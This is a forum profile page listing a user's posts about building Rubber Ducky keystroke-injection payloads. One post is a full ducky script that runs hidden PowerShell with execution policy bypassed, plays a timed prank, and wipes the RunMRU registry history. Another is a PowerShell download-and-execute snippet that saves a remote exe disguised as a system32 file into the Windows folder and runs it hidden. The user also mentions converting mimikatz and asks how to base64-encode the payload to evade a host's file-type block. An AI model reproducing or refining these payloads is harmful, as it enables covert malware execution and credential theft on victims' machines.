Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

About Finianb1

  • Rank

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Nevermind I'm dumb I have to unescape it.
  2. It doesn't seem to work for me. I'm trying to get it to run at 4:20 PM. Here is my code (converted to duckyscript): REM Rick Roll at specific time of day REM Set time according to: REM https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/prank/UnifiedRickRollWindows/README.md GUI r DELAY 200 STRING cmd -A '/t:fe /k mode con: lines=1 cols=15' DELAY 200 ENTER DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass \$hi=0\; \$ho=\(Get-Date\).Hour.toString\(\)\; while \(\$hi -eq \'0\'\) \{ if \(\$ho -eq 1620 \) \{\$vol=new-object -com wscript.shell\; For\(\$i=0\; \$i -le 50\; \$i\+\+\)\{\$vol.SendKeys\(\[char\]175\)\}\; start \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; \$hi=1\; \} \$ho=\(Get-Date\).Hour.toString\(\)\+\(Get-Date\).Minute.toString\(\)\;\} DELAY 500 ENTER GUI r DELAY 1000 STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER
  3. That's what I wanted to figure out, was how to do such a base64 encoding and decoding in PowerShell.
  4. I'm trying to convert mimikatz if that helps.
  5. Hi everyone, I'm trying to make a powershell wget and execute payload for the ducky but 000webhosting, my usual go-to webhost, doesn't allow .exe files. I was wondering if there was another hosting site that is free and does allow exes, or if there is some way I can encode the payload or something similar to get around such a block. I thought you might be able to encode it using base 64 in a text file, but I don't know how I'd make the powershell convert it from plaintext to binary using base64. I was thinking something like this. Any help is appreciated. Here is my script so far: $source = "mysite.com/executables/system32.exe"; $destination = "C:\Windows\system32helper.exe"; Invoke-WebRequest $source -OutFile $destination; start-process system32.exe That gets entered into a hidden powershell window. Thank you for your time.
  • Create New...